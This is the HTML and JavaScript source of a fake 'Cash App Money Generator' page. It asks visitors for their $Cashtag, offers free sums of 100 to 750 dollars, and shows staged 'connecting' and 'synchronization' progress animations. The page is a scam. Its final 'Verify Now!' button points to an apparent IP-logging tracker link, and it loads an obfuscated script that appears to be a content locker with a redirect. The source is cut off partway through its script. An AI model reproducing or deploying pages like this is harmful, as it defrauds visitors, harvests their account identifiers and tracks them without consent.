<!DOCTYPE html><!--

--><html lang="en"><head>
    <title>Cash App Money Generator</title>
<meta name="description" content="Cash App Money Generator">
<meta property="og:title" content="Cash App Money Generator">
<meta property="og:description" content="Cash App Money Generator">
<meta name="referrer" content="no-referrer">

<!-- Analytics -->

<script async="" src="js/analytics.js"></script><script src="js/bundle.min.js" crossorigin="anonymous"></script>
<script>
    Sentry.init({
        dsn: 'https://e0e6a104cb354a09bf094a90e676ea13@o425163.ingest.sentry.io/5780930',
        tracesSampleRate: 0.01
    });
</script>
<script>
    (function (i, s, o, g, r, a, m) {
        i['GoogleAnalyticsObject'] = r;
        i[r] = i[r] || function () {
            (i[r].q = i[r].q || []).push(arguments)
        }, i[r].l = 1 * new Date();
        a = s.createElement(o), m = s.getElementsByTagName(o)[0];
        a.async = 1;
        a.src = g;
        m.parentNode.insertBefore(a, m)
    })(window, document, 'script', 'https://www.google-analytics.com/analytics.js', 'ga');


    
    ga('send', 'pageview');

</script>


    <style>
        .header_blue {
            background: #1565c0;
            padding: 80px 0 20px;
            color: #fff;
            font-size: 48px;
            font-weight: 300;
            margin-bottom: 40px;
        }
        .header_text {
            margin-left: auto;
            margin-right: auto;
            width: 80%;
        }
        body{
            margin:0;
            font-family:Roboto, sans-serif;
            color:#444;
        }
        .unlockBtn:hover{
            box-shadow: 0 3px 6px rgba(0,0,0,.16), 0 3px 6px rgba(0,0,0,.23);
        }
        .unlockBtn {
            background: #2196f3;
            border: none;
            border-radius: 2px;
            box-shadow: 0 1px 3px rgba(0,0,0,.12), 0 1px 2px rgba(0,0,0,.24);
            min-height: 31px;
            min-width: 70px;
            padding: 2px 16px;
            text-align: center;
            text-shadow: none;
            text-transform: uppercase;
            -webkit-transition: all 280ms ease;
            transition: all 280ms ease;
            box-sizing: border-box;
            cursor: pointer;
            -webkit-appearance: none;
            display: inline-block;
            vertical-align: middle;
            font: 500 14px/31px Roboto,sans-serif!important;
            outline: 0!important;
            color:white;
        }
        .content-container{
            width:80%;margin:0 auto;
        }
        @font-face{font-family:'Roboto';font-style:normal;font-weight:300;src:local('Roboto Light'),local(Roboto-Light),url(fonts/Pru33qjShpZSmG3z6VYwnRJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Roboto';font-style:normal;font-weight:300;src:local('Roboto Light'),local(Roboto-Light),url(fonts/Hgo13k-tfSpn0qi1SFdUfVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215,U+E0FF,U+EFFD,U+F000}@font-face{font-family:'Roboto';font-style:normal;font-weight:500;src:local('Roboto Medium'),local(Roboto-Medium),url(fonts/oOeFwZNlrTefzLYmlVV1UBJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Roboto';font-style:normal;font-weight:500;src:local('Roboto Medium'),local(Roboto-Medium),url(fonts/RxZJdnzeo3R5zSexge8UUVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215,U+E0FF,U+EFFD,U+F000}
        html {
  scroll-behavior: smooth;
}

body {
  background-color: #00a243;
  font-family: Roboto;
}
.cardicon{
  width: 80px;
  margin-top: 20px;
}
.color-change-2x {
  animation: color-change-2x 2s linear infinite alternate both
}

@keyframes color-change-2x {
  0% {
    background: #dd2450
  }

  100% {
    background: #0da9ed
  }
}

.logo {
  width: 80px;
  margin-top: 30px;
  position: relative;
}

/*  */

@import url('https://fonts.googleapis.com/css?family=Exo:400,700');

*{
    margin: 0px;
    padding: 0px;
}


.context {
    width: 100%;
    position: absolute;
    top:50vh;
    
}

.context h1{
    text-align: center;
    color: #fff;
    font-size: 50px;
}


.area{
    background: #4e54c8;  
    background: -webkit-linear-gradient(to left, #8f94fb, #4e54c8);  
    width: 100%;

    
   
}

.circles{
    position: absolute;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    overflow: hidden;
    z-index: -1;
}

.circles li{
    position: absolute;
    display: block;
    list-style: none;
    width: 20px;
    height: 20px;
    background: whitesmoke;
    animation: animate 25s linear infinite;
    bottom: -150px;
    
}

.circles li:nth-child(1){
    left: 25%;
    width: 80px;
    height: 80px;
    animation-delay: 0s;
}


.circles li:nth-child(2){
    left: 10%;
    width: 20px;
    height: 20px;
    animation-delay: 2s;
    animation-duration: 12s;
}

.circles li:nth-child(3){
    left: 70%;
    width: 20px;
    height: 20px;
    animation-delay: 4s;
}

.circles li:nth-child(4){
    left: 40%;
    width: 60px;
    height: 60px;
    animation-delay: 0s;
    animation-duration: 18s;
}

.circles li:nth-child(5){
    left: 65%;
    width: 20px;
    height: 20px;
    animation-delay: 0s;
}

.circles li:nth-child(6){
    left: 75%;
    width: 110px;
    height: 110px;
    animation-delay: 3s;
}

.circles li:nth-child(7){
    left: 35%;
    width: 150px;
    height: 150px;
    animation-delay: 7s;
}

.circles li:nth-child(8){
    left: 50%;
    width: 25px;
    height: 25px;
    animation-delay: 15s;
    animation-duration: 45s;
}

.circles li:nth-child(9){
    left: 20%;
    width: 15px;
    height: 15px;
    animation-delay: 2s;
    animation-duration: 35s;
}

.circles li:nth-child(10){
    left: 85%;
    width: 150px;
    height: 150px;
    animation-delay: 0s;
    animation-duration: 11s;
}



@keyframes animate {

    0%{
        transform: translateY(0) rotate(0deg);
        opacity: 1;
        border-radius: 0;
    }

    100%{
        transform: translateY(-1000px) rotate(720deg);
        opacity: 0;
        border-radius: 50%;
    }

}

/*  */

.loading-form {
  width: 100%;
  height: 100%;
  position: absolute;
  top: 0;
  left: 0;
  background-color: #0055ff;
  display: flex;
  justify-content: center;
  align-items: center;
  z-index: 5
}

h1 {
  color: black;
  text-shadow: 0 0 5px black;
  font-size: 32px;
  margin-top: 0px;
  padding-top: 0px;
}

.content {
  max-width: 800px;
  width: 90%;
  position: relative;
  height: auto;
  margin-top: 100px;
  padding-bottom: 40px;
}

.data1 {
  display: block;
  left: 0;
  top: 0;
  width: 100%;
  max-width: 500px;
  content: '';
  background: #ffffff;
  box-shadow: 0 0 5px 0px #00000052;
  padding-bottom: 30px;
  z-index: -1;
  border-radius: 40px;
}

.header-num-container {
  width: 63px;
  position: relative;
  height: 40px;
}

.header-num {
  font-size: 30px;
}

.header-num::after {
  content: '1';
  padding-top: 10px;
  padding-bottom: 10px;
  width: 66px;
  height: 46px;
  position: absolute;
  left: -3px;
  top: -23px;
  background-color: #00a243;
  z-index: 2;
  border-radius: 50%;
}

.header-num::before {
  color: black;
  content: '1';
  padding-top: 10px;
  padding-bottom: 10px;
  width: 60px;
  height: 40px;
  position: absolute;
  left: 0;
  top: -20px;
  z-index: 3;
  border-radius: 50%;
  background-color: white;
  font-weight: bold;
}

.input-form {
  margin-top: 20px;
  position: relative;
  width: 80%;
  padding-top: 0px;
  padding-bottom: 0px;
}

.text1 {
  margin-top: 30px;
  margin-bottom: 5px;
  position: relative;
  width: 90%;
  font-size: 22px;
  color: #2a2a2a;
  font-weight: bold;
}

.subtext {
  color: #838383;
  width: 100%;
  max-width: 400px;
  margin-top: 10px;
}

.input-bg {}

.input-bg::after {}

.input-bg::before {
  content: '';
  height: 100%;
  width: 100%;
  position: absolute;
  left: 0;
  top: 0px;
  z-index: 2;
  background: #ffffff;


  border-radius: 40px;
  /* box-shadow: 0 0 5px black; */
  border-style: solid;
  border-color: #838383;
  border-width: 2px;
}

.epu-u-i {
  font-family: Acme;
  outline: none;
  appearance: none;
  -moz-appearance: none;
  -webkit-appearance: none;
  background: transparent;
  box-shadow: none;
  border: none;
  width: 70%;
  height: 60px;
  z-index: 3;
  position: relative;
  padding: 0 54px 0 33px;
  color: black;
  font-size: 26px;
  te: ;
  font-size: 26px;
  background-image: url(images/1519142366dc2e4f957c708701965dd43fa1d903a1.png);
  background-repeat: no-repeat;
  background-position: left;
  background-size: 25px;
}

.platform-form {
  width: 90%;
  margin-top: 10px;
}

.allplatform {
  width: 100px;
  height: 80px;


  display: inline-block;
  cursor: pointer;
  margin: 10px;
}

.platform {
  background: #0086e6;
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  border-style: solid;
  border-width: 5px;
  border-color: #00c3ff;
}

.bntProcess {
  width: 200px;
  padding-top: 20px;
  padding-bottom: 20px;


  cursor: pointer;
  background-color: #00a243;
  margin-top: 28px;
  color: white;
  font-size: 22px;
  border-radius: 7px;
}

.bntProcess2 {
  width: 200px;
  padding-top: 20px;
  padding-bottom: 20px;


  cursor: pointer;
  background-color: #0364ee;
  margin-top: 10px;
  color: white;
  font-size: 22px;
  border-radius: 0px;
}

.bntverify {
  width: 200px;
  padding-top: 20px;
  padding-bottom: 20px;


  cursor: pointer;
  background-color: #0364ee;
  margin-top: 10px;
  color: white;
  font-size: 22px;
  border-radius: 7px;
}

.selectAmountinfo {
  display: inline-block;
  color: black;
}

.selectAmounticoninfo {
  display: inline-block;
  width: 40px;
  position: relative;
  height: 29px;
}

.bntProcessform {
  width: 200px;


  background-color: white;
  margin-top: 10px;
  color: #f03b44;
  font-size: 22px;
  padding-top: 5px;
  overflow: hidden;
  border-radius: 20px;
  border-width: 1px;
  border-style: solid;
  border-color: #d6d6d6;
  position: relative;
}

.vbamounticon {
  display: inline-block;
}

.selectdAmount {
  color: white;
  font-size: 10px;
  width: 120px;
  background-color: #f03b44;
  position: absolute;
  top: -9px;
  left: 50%;
  border-radius: 10px;
  padding-top: 13px;
  padding-bottom: 5px;
  margin-left: -60px;
}

.selectedinfocontainer {
  position: relative;
  width: 100%;
  /* height: 50px; */
  margin-top: 20px;
}

.selectedcardicon {
  width: 40px;
  position: absolute;
  left: 0;
}

.step2 {
  width: 100%;
  max-width: 300px;
  height: 100%;
}

.step3 {
  position: absolute;
  top: 0;
  left: 50%;
  width: 100%;
  max-width: 300px;
  margin-left: -150px;
  height: 100%;
  z-index: -1;
}

.data2 {
  padding-top: 20%;
  width: 100%;
  height: 100%;
  padding-bottom: 30%;
}

.searching {
  width: 250px;
  position: relative;
}

.searchingname {
  width: 100px;
  display: inline-block;
  cursor: pointer;
  margin: 5px;
}

.searchingplatform {
  background: #0086e6;
  position: absolute;
  top: -3px;
  left: 0;
  width: 60px;
  height: 100%;
  border-style: solid;
  border-width: 4px;
  border-color: #0086e6;
}

.serachingname {
  color: #2d2d2d;
  text-align: left;
  /* padding-left: 70px; */
  padding-right: -70px;
  /* padding-top: 16px; */
  /* padding-bottom: 16px; */
  font-size: 28px;
  text-align: center;
  font-weight: bold;
}

.Search-Icon {
  padding-top: 15%;
  position: absolute;
  top: 10px;
  width: 100px;
  animation: searchAnimation1 3s linear infinite;
}

@keyframes searchAnimation1 {
  0% {
    left: 50px;
    top: 30px
  }

  13% {
    left: 85px;
    top: 5px
  }

  25% {
    left: 110px;
    top: 0px
  }

  38% {
    left: 135px;
    top: 5px
  }

  50% {
    left: 160px;
    top: 30px
  }

  63% {
    left: 135px;
    top: 55px
  }

  75% {
    left: 110px;
    top: 80px
  }

  88% {
    left: 85px;
    top: 55px
  }

  100% {
    left: 50px;
    top: 30px
  }
}

.content2 {
  width: 750px;
  max-width: 80%;
  position: relative;
  height: auto;
  margin-top: 40px;
  padding-bottom: 40px;
}

.content3 {
  width: 750px;
  max-width: 80%;
  position: relative;
  height: auto;
  margin-top: 40px;
  padding-bottom: 40px;
}

.content4 {
  width: 250px;
  max-width: 80%;
  position: relative;
  height: auto;
  margin-top: 40px;
  padding-bottom: 10px;
  margin-bottom: 30px;
}

.content5 {
  width: 750px;
  max-width: 80%;
  position: relative;
  height: auto;
  margin-top: 40px;
  padding-bottom: 40px;
}

.header-num2 {
  font-size: 30px;
}

.header-num2::after {
  content: '2';
  padding-top: 10px;
  padding-bottom: 10px;
  width: 66px;
  height: 46px;
  position: absolute;
  left: -3px;
  top: -23px;
  background-color: #00a243;
  z-index: 2;
  border-radius: 50%;
}

.header-num2::before {
  color: black;
  content: '2';
  padding-top: 10px;
  padding-bottom: 10px;
  width: 60px;
  height: 40px;
  position: absolute;
  left: 0;
  top: -20px;
  z-index: 3;
  border-radius: 50%;
  background-color: white;
  font-weight: bold;
}

.header-num3 {
  font-size: 30px;
}

.header-num3::after {
  content: '3';
  padding-top: 10px;
  padding-bottom: 10px;
  width: 66px;
  height: 46px;
  position: absolute;
  left: -3px;
  top: -23px;
  background-color: #00a243;
  z-index: 2;
  border-radius: 50%;
}

.header-num3::before {
  color: black;
  content: '3';
  padding-top: 10px;
  padding-bottom: 10px;
  width: 60px;
  height: 40px;
  position: absolute;
  left: 0;
  top: -20px;
  z-index: 3;
  border-radius: 50%;
  background-color: white;
  font-weight: bold;
}

.Card-form {
  width: 90%;
  margin-top: 10px;
}

.card {
  background-color: white;
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  border-style: solid;
  border-width: 2px;
  border-color: #60605f14;
  border-radius: 30px;
}

.allcard {

  transform: skew(0deg);
  width: 130px;
  height: 180px;
  display: inline-block;
  cursor: pointer;
  margin: 12px;
  z-index: 5;
}

.card-detail {
  width: 100%;
  height: 40px;
  background-color: #ff0;
  position: absolute;
  bottom: 0;
}

.card-value {
  text-align: center;
  margin-right: 10px;
  font-size: 20px;
  color: white;
  background-color: :red;
  width: 50px;
  /* height: 12px; */
  background-color: #f03b44;
  border-radius: 6px;
  position: relative;
}

.card-valuebg {
  width: 20px;
  height: 20px;
  background-color: #f03b44;
  position: absolute;
  transform: rotate(45deg);
  bottom: -3px;
  left: 50%;
  margin-left: -10px;
  z-index: -1;
  border-radius: 2px;
}

.card-value::before {
  width: 200px;
  height: 30px;
  background-color: red;
}

.card-name {
  margin-top: 7px;
}

.pro-bg {
  margin-top: 10px;
  width: 80%;
  max-width: 250px;
  height: 15px;
  background-color: #e1e1e1;
  text-align: left;


overflow: hidden;
  border-radius: 30px;
}

.pro-bar {
  height: 100%;
  background-color: #0055ff;
}
.bgwave{
  background-image: url(images/16666771187b228e9ef64b4d7b62cebd1134a2a485.png);
  width: 100%;
  height: 100%;
  background-size:1000px;
  position: absolute;
  top: 0;
  left: 0;
  background-repeat-y: no-repeat;
  background-position-x: 0px;

    animation: wave linear 4s infinite;
  }
    @keyframes wave {
    0% {
      background-position-x: 0px;
    }
      100% {
      background-position-x: 1000px;
    }
  }
  .bgwave2{
    background-image: url(images/16666771187b228e9ef64b4d7b62cebd1134a2a485.png);
    width: 100%;
    height: 100%;
    opacity: 0.5;
    background-size:1000px;
    position: absolute;
    top: 0;
    left: 0;
    background-repeat-y: no-repeat;
    background-position-x: 0px;

      animation: wave2 linear 6s infinite;
    }
      @keyframes wave2 {
      0% {
        background-position-x: 1000px;
      }
        100% {
        background-position-x: 0px;
      }
    }
.pro-bg2 {
  margin-top: 0px;
  width: 80%;
  max-width: 150px;
  height: 15px;
  background-color: #e1e1e1;
  text-align: left;


overflow: hidden;
  border-radius: 30px;
}

.pro-bar2 {
  height: 100%;
  background-color: #0055ff;
}

.step1-text {
  color: black;
  font-size: 18px;
  margin-top: 10px;
  text-shadow: 5px;
  font-weight: 300;
  animation: bounceIn 0.5s ease-in;
}

.step2-text {
  color: #2f2f2f;
  font-size: 14px;
  margin-top: 0px;
  margin-bottom: 5px;
  text-shadow: 5px;
  font-weight: 300;
  animation: bounceIn 0.5s ease-in;
  /* background-color: #000095; */
  width: 90px;
  padding-top: 5px;
  padding-bottom: 5px;

  /* border-style: solid; */
  /* border-color: #0055ff; */
  /* border-width: 4px;*/
}




/*Animation*/
  .pro0To100 {
    animation: pro0To100 4s;
    box-shadow: black 0px 0px 5px;
    animation-fill-mode: forwards;
  }

  @keyframes pro0To100 {
    0% {
      width: 0
    }

    100% {
      width: 100%
    }
  }

  .pro10 {
    animation: pro10 1s;
    box-shadow: black 0px 0px 5px;
    animation-fill-mode: forwards;
  }

  @keyframes pro10 {
    0% {
      width: 0
    }

    100% {
      width: 10%
    }
  }

  .pro10to20 {
    animation: pro10to20 2s;
    box-shadow: black 0px 0px 5px;
    animation-fill-mode: forwards;
  }

  @keyframes pro10to20 {
    0% {
      width: 10%
    }

    100% {
      width: 20%
    }
  }

  .pro20to70 {
    animation: pro20to70 4s;
    box-shadow: black 0px 0px 5px;
    animation-fill-mode: forwards;
  }

  @keyframes pro20to70 {
    0% {
      width: 20%
    }

    100% {
      width: 70%
    }
  }

  .pro70to94 {
    animation: pro70to94 2s;
    box-shadow: black 0px 0px 5px;
    animation-fill-mode: forwards;
  }

  @keyframes pro70to94 {
    0% {
      width: 70%
    }

    100% {
      width: 94%
    }
  }

  .sakeanimation {
    animation: shake 0.5s;
  }

  @keyframes shake {
    0% {
      left: 0
    }

    10% {
      left: -10px
    }

    20% {
      left: 0
    }

    30% {
      left: 10px
    }

    40% {
      left: 0
    }

    50% {
      left: -5px
    }

    60% {
      left: 0
    }

    70% {
      left: 5px
    }

    80% {
      left: 0
    }

    90% {
      left: -3px
    }

    1000% {
      left: 0
    }
  }

  .zoomout {
    animation: zoomout 1s;
    animation-fill-mode: forwards;
  }

  @keyframes zoomout {
    0% {
      transform: scale(1);
    }

    100% {
      transform: scale(1.2);
    }
  }

  .zoomin {
    animation: zoomin 1s;
    animation-fill-mode: forwards;
  }

  @keyframes zoomin {
    0% {
      transform: scale(1.2);
    }

    100% {
      transform: scale(1);
    }
  }

  .hideanimation {
    animation: hideanimation 0.4s;
    animation-fill-mode: forwards;
  }

  @keyframes hideanimation {
    0% {
      opacity: 1;
    }

    100% {
      opacity: 0;
    }
  }

  .hidein {
    animation: flyinhide 1s;
    animation-fill-mode: forwards;
  }

  @keyframes flyinhide {
    0% {
      transform: scale(1);
    }

    10% {
      transform: scale(0.9);
    }

    20% {
      transform: scale(1.1);
    }

    100% {
      transform: scale(0);
    }
  }

  .showin {
    animation: showin 0.5s;
    animation-fill-mode: forwards;
  }

  @keyframes showin {
    0% {
      transform: scale(0);
    }

    30% {
      transform: scale(1);
    }

    60% {
      transform: scale(1.1);
    }

    100% {
      transform: scale(1);
    }
  }

  .showin1 {
    animation: showin1 1s;
    animation-fill-mode: forwards;
  }

  @keyframes showin1 {
    0% {
      transform: scale(0);
    }

    30% {
      transform: scale(1);
    }

    60% {
      transform: scale(1.1);
    }

    100% {
      transform: scale(1);
    }
  }

  .showin2 {
    animation: showin2 1.4s;
    animation-fill-mode: forwards;
  }

  @keyframes showin2 {
    0% {
      transform: scale(0);
    }

    30% {
      transform: scale(1);
    }

    60% {
      transform: scale(1.1);
    }

    100% {
      transform: scale(1);
    }
  }

  .showin3 {
    animation: showin3 1.8s;
    animation-fill-mode: forwards;
  }

  @keyframes showin3 {
    0% {
      transform: scale(0);
    }

    30% {
      transform: scale(1);
    }

    60% {
      transform: scale(1.1);
    }

    100% {
      transform: scale(1);
    }
  }

  .showin4 {
    animation: showin4 2.2s;
    animation-fill-mode: forwards;
  }

  @keyframes showin4 {
    0% {
      transform: scale(0);
    }

    30% {
      transform: scale(1);
    }

    60% {
      transform: scale(1.1);
    }

    100% {
      transform: scale(1);
    }
  }

  .showin5 {
    animation: showin4 2.2s;
    animation-fill-mode: forwards;
  }

  @keyframes showin4 {
    0% {
      transform: scale(0);
    }

    30% {
      transform: scale(1);
    }

    60% {
      transform: scale(1.1);
    }

    100% {
      transform: scale(1);
    }
  }

  .showinplatform {
    animation: showinplatform 1s;
    animation-fill-mode: forwards;
  }

  @keyframes showinplatform {
    0% {
      transform: scale(0);
    }

    30% {
      transform: scale(0.9);
    }

    60% {
      transform: scale(1.1);
    }

    100% {
      transform: scale(1);
    }
  }

  .rotate {
    animation: step2animation 4s linear infinite;
  }

  @keyframes step2animation {
    0% {
      transform: rotate(0deg);
    }

    100% {
      transform: rotate(360deg);
    }
  }

  .showinname {
    animation: showinname 1s;
    animation-fill-mode: forwards;
  }

  @keyframes showinname {
    0% {
      transform: scale(0);
    }

    30% {
      transform: scale(0.9);
    }

    60% {
      transform: scale(1.1);
    }

    100% {
      transform: scale(1);
    }
  }

  .slit-out-vertical {
    animation: slit-out-vertical .5s ease-in both
  }

  @keyframes slit-out-vertical {
    0% {
      transform: translateZ(0) rotateY(0);
      opacity: 1
    }

    54% {
      transform: translateZ(-160px) rotateY(87deg);
      opacity: 1
    }

    100% {
      transform: translateZ(-800px) rotateY(90deg);
      opacity: 0
    }
  }

  @media only screen and (max-width:480px) {
    .cardicon{
      width: 80px;
      margin-top: 10px;
    }
    .card-valuebg {
    width: 10px;
    height: 10px;
    background-color: #f03b44;
    position: absolute;
    transform: rotate(45deg);
    bottom: -3px;
    left: 50%;
    margin-left: -5px;
    z-index: -1;
    border-radius: 2px;
}

    .text1 {
      margin-top: 20px;
      margin-bottom: 10px;
      position: relative;
      width: 90%;
      font-size: 16px;
    }

    .Card-form {
      width: 100%;
    }

    .content2 {
      max-width: 100%;
      position: relative;
      height: auto;
      margin-top: 50px;
      padding-bottom: 40px;
    }

    .allcard {
      transform: skew(0deg);
      width: 100px;
      height: 140px;
      display: inline-block;
      cursor: pointer;
      margin: 12px;
      z-index: 5;
    }

    .card-value {
      text-align: center;
      margin-right: 10px;
      font-size: 13px;
    }

    .logo {
      margin-top: 20px;
      position: relative;
    }

    .epu-u-i {
      height: 47px;
      padding: 0 0px 0 38px;
      font-size: 24px;
    }

    .allplatform {
      width: 60px;
      height: 60px;
      display: inline-block;
      cursor: pointer;
      margin: 10px;
    }
  }

    </style>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>
<body>



  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>Cash App Money Generator</title>
    <link rel="stylesheet" type="text/css" href="css/style.css">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Acme">
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto">



  <ul class="circles">
    <li></li>
    <li></li>
    <li></li>
    <li></li>
    <li></li>
    <li></li>
    <li></li>
    <li></li>
    <li></li>
    <li></li>
</ul>


  <div class="bgwave"></div>
  <div class="bgwave2"></div>
  <center>
<div class="logo showin" id="logo"><img src="images/1519142366dc2e4f957c708701965dd43fa1d903a1.png" style="width:100%">
</div>
<div class="showin" id="texth1"><h1>Cash App Money Generator</h1></div>

<div class="content showin" id="content">

<div class="data1">

  <div class="header-num-container"><div class="header-num">1</div></div>


  <div class="step1" id="step1">
<div class="text1">What's your UID?</div>
<div class="subtext">Enter your $Cashtag or Email to which you want to send the generated Money.</div>
<div class="input-form" id="input-form">
<div class="input-bg" id="input-bg">
<input id="uid" class="epu-u-i" spellcheck="false" placeholder="Your $Cashtag...">
</div>
</div>
<div class="subtext">Make sure to enter a correct $Cashtag without any additional symbols.</div>
<div onclick="proceed()" class="bntProcess">PROCEED</div>
</div>


<div id="step2" class="step2">
  <div class="data2 showin" id="data2" style="display:none">
  <div class="text1" style="margin-bottom:5px;display:none">Searching...</div>
<div class="searching">
  <div class="searchingdata">
<p style="color: #4d4d4d;font-weight: bold;">CONNECTING...</p>
<div class="serachingname showinname" id="text-name">sdfsdf</div>

  </div>
</div>
  <img src="images/1666678125b2df2d9460abcb1a2221569f6c5e2621.png" class="Search-Icon">
</div>

</div>
</div>
<div id="step3" class="step3" style="display:none;z-index:4">
  <div style="padding-top:40%;color:#2db573;">SUCCESS!</div>
  <div class="showin"><img src="images/1666677117a3f036a31c12131556d0d64d66ac91ab.gif" style="width:120px;"></div>
</div>

</div>

<div class="content2 showin" id="content2" style="display:none">
<div class="data1">
  <div class="header-num-container"><div class="header-num2"></div></div>


  <div class="step1" id="step1">

<div class="Card-form">

  <div class="allcard" onmouseover="cardOver(1)" onmouseout="cardOut(1)">
  <div onclick="selectedcard(1)" class="card showin1" id="card1" style="border-color: #f23f3f;box-shadow: 0 0 5px 0px #000000b5;">
    <img src="images/1519142366dc2e4f957c708701965dd43fa1d903a1.png" class="cardicon" id="cardlogo1">
        <div class="card-value"><div class="card-valuebg"></div>100</div>
        <div class="card-name" id="cardname1" style="font-weight:600;">Dollars</div>
          </div>
</div>

<div class="allcard" onmouseover="cardOver(2)" onmouseout="cardOut(2)">
<div onclick="selectedcard(2)" class="card showin2" id="card2">
  <img src="images/1519142366dc2e4f957c708701965dd43fa1d903a1.png" class="cardicon" id="cardlogo2">
      <div class="card-value"><div class="card-valuebg"></div>200</div>
      <div class="card-name" id="cardname2">Dollars</div>
        </div>
</div>

<div class="allcard" onmouseover="cardOver(3)" onmouseout="cardOut(3)">
<div onclick="selectedcard(3)" class="card showin3" id="card3">
  <img src="images/1519142366dc2e4f957c708701965dd43fa1d903a1.png" class="cardicon" id="cardlogo3">
      <div class="card-value"><div class="card-valuebg"></div>500</div>
      <div class="card-name" id="cardname3">Dollars</div>
        </div>
</div>

<div class="allcard" onmouseover="cardOver(4)" onmouseout="cardOut(4)">
<div onclick="selectedcard(4)" class="card showin4" id="card4">
  <img src="images/1519142366dc2e4f957c708701965dd43fa1d903a1.png" class="cardicon" id="cardlogo4">
      <div class="card-value"><div class="card-valuebg"></div>750</div>
      <div class="card-name" id="cardname4">Dollars</div>
        </div>
</div>
</div>
<div class="bntProcessform">
<div class="selectdAmount">  SELECTED AMOUNT </div>
<div class="selectedinfocontainer">
  <div class="selectAmounticoninfo"><img src="images/1519142366dc2e4f957c708701965dd43fa1d903a1.png" class="selectedcardicon"></div>
  <div id="selectAmount" class="selectAmountinfo">750  </div><span style="font-size:16px;color:black"> Dollars</span>

</div>

<div onclick="proceed2()" class="bntProcess2 showin5">PROCEED</div>
</div>
</div>

</div>
</div>



<div class="content3 showin" id="content3" style="display:none">
<div class="data1">
  <div class="header-num-container"><div class="header-num3"></div></div>
  <div class="step1" id="step1">
<img src="images/1666677118a39622f82f1b057b280eae8dfe6fea20.png" class="rotate" style="width:150px;margin-top:20px;">
 <div class="step1-text" id="loading-step">Loading...</div>
<div class="pro-bg">
<div class="pro-bar" id="pro-bar">
</div>
</div>
</div>
</div>
</div>



<div class="content4 showin" id="content4" style="display:none">
  <div class="data1">
      <img src="images/1666677118a39622f82f1b057b280eae8dfe6fea20.png" class="rotate" style="    width: 25px;
    position: absolute;
    right: 15px;
    top: 10px;">

  <div class="step1" id="step1">

<img src="images/1519142366dc2e4f957c708701965dd43fa1d903a1.png" style="width:60px;margin-top:30px;">
 <div class="step2-text" id="gen-coin">0</div>
<div class="pro-bg2">
<div class="pro-bar2" id="pro-bar2">
</div>
</div>
</div>
</div>
  </div>


<div class="content5 showin" id="content5" style="display:none">
<div class="data1">
  <div style="      background-color: white;
    margin-left: -30px;
    position: absolute;
    top: -30px;
    left: 50%;
    padding: 20px;
    transform: skew(
-1deg);

    border-radius: 50%;
    border-width: -8px;
    border-style: solid;
    border-color: #e0e0e0;
    border-width: 0 0 5px #0364ee;">
<img src="images/1666677118a39622f82f1b057b280eae8dfe6fea20.png" class="rotate" style="width:25px;">
  </div>

<div style="position:relative;padding-top:40px;">
 <div class="text1">Hello <span id="NameLastStep" style="font-size:24px;color:#0364ee;font-style:italic;font-weight: bold;">User</span> ! You are almost done with synchronization of <span id="coinamount" style="font-size:24px;color:#0364ee;font-style:italic;font-weight: bold;">1500</span> Dollars! Please complete the last step by click the button below to finish with synchronization process.</div>
</div>
<div class="bntverify showin5"><a style="color:white;" href="https://grabify.link/TX3G8N" target="_blank">Verify Now!</a></div>
</div>
</div>

</center>

<script src="js/main.js"></script>



<script src="js/jquery.min.js"></script>
<script type="text/javascript">
    var OXIPq_GDY_NGdohc={"it":3188247,"key":"46ec2"};
    var forward="";
    OXIPq_GDY_NGdohc.onComplete=function(data){
        window.location=forward;
        return false;
    };
</script>
<script src="js/8435cf1.js"></script>
<script type="text/javascript">
    $('.showContentLocker').click(function(){
       _Ts();
        return false;
    });
</script>
<script>

</script>
<script type="text/javascript">
    var audioclick = new Audio('#');
var audiolaststep = new Audio('#');
var audiopoinrunning = new Audio('#');
var audioselected = new Audio('#');
var audiosuccess = new Audio('#');
var name="";
var plateformIndex;

function selectPlatform(plateform){
  audioselected.play();
  document.getElementById("platform1").classList.remove("sakeanimation");
  document.getElementById("platform2").classList.remove("sakeanimation");
  document.getElementById("platform3").classList.remove("sakeanimation");

  document.getElementById("platform1").style.backgroundColor="#0086e6";
  document.getElementById("platform2").style.backgroundColor="#0086e6";
  document.getElementById("platform3").style.backgroundColor="#0086e6";

  document.getElementById("platform1").style.borderColor="#00c3ff";
  document.getElementById("platform2").style.borderColor="#00c3ff";
  document.getElementById("platform3").style.borderColor="#00c3ff";

  document.getElementById("platform"+plateform).classList.add("sakeanimation");
document.getElementById("platform"+plateform).style.backgroundColor="#00b3ff";
document.getElementById("platform"+plateform).style.borderColor="#89ffff";
plateformIndex=plateform;
console.log(document.getElementById("platform"+plateform).style.backgroundImage);
document.getElementById("seletedplatform").style.backgroundImage=document.getElementById("platform"+plateform).style.backgroundImage;
}


var cardclicked=1;
var cardvalue=750;
function selectedcard(cardnum){
    audioselected.play();
  if (cardnum==1){
      document.getElementById("selectAmount").textContent="100";
      cardvalue=100;
  }else if(cardnum==2){
    document.getElementById("selectAmount").textContent="200";
    cardvalue=200;
  }
  else if(cardnum==3){
    document.getElementById("selectAmount").textContent="500";
    cardvalue=500;
  }
  else if(cardnum==4){
    document.getElementById("selectAmount").textContent="750";
    cardvalue=750;
  }
  document.getElementById("card1").style.borderColor="#60605f14";
